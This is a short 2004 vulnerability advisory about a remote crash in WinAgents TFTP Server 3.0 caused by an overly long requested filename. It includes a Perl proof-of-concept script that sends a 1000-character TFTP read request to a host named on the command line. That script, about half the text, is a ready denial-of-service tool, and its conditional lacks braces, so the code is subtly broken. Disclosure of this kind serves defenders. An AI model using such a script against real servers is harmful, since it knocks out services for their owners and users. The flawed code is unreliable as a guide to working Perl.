WinAgents TFTP Server Long File Remote Denial Of Service Vulnerability


Date: 10 June 2004
Security Alert ID: 1008084
Added by: HH

Description:
A vulnerability in WinAgents TFTP Server has been reported, allowing a remote user to cause the TFTP service to crash.

It is reported that a remote user can request a file with a long filename (1000 characters) to cause the TFTP server to crash


Affected:
TFTP Server version 3.0.


Proof Of Concept:
#!/usr/bin/perl
#
# Remote D.O.S WinAgents TFTP Server ver 3.0
#
# Tftp.pl <Host>

use IO::Socket;

$Tftp_Port = "69";
$FileName = "A"x1000;
$Tftp_OP = "\x00\x01";
$Tftp_M  = "bin";
$Buf = $Tftp_OP . $Tftp_M . $FileName ;

if(!($ARGV[0]))

print "\nUsage: perl $0 <Host>\n" ;

exit;

print "\nRemote D.O.S WinAgents TFTP Server ver 3.0 PoC\n\n\n";

$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket Error ...\n"
;
$ipaddr = inet_aton($ARGV[0]);
$portaddr = sockaddr_in($Tftp_Port, $ipaddr);
send($socket, $Buf, 0, $portaddr) == length($Buf) or die "Error : Can't send ...\n";
print "Server : $ARGV[0] Is Down ... \n";


Solution:
The vendor was notified on June 7 2004, stating a fix will be released shortly.


Credits:
Ziv Kamir, Global Security Solution IT.